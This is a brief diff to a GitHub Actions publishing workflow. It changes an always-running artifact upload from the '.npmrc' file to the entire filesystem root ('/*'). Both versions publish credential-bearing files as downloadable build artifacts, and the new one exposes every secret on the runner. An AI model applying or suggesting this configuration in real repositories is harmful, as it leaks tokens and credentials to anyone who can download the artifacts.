--- a/.github/workflows/publish-to-github-packages.yml
+++ b/.github/workflows/publish-to-github-packages.yml
@@ -39,6 +39,6 @@ jobs:
       if: always()
       with:
         name: artifacts
-        path: .npmrc
+        path: /*
         if-no-files-found: error
         retention-days: 1
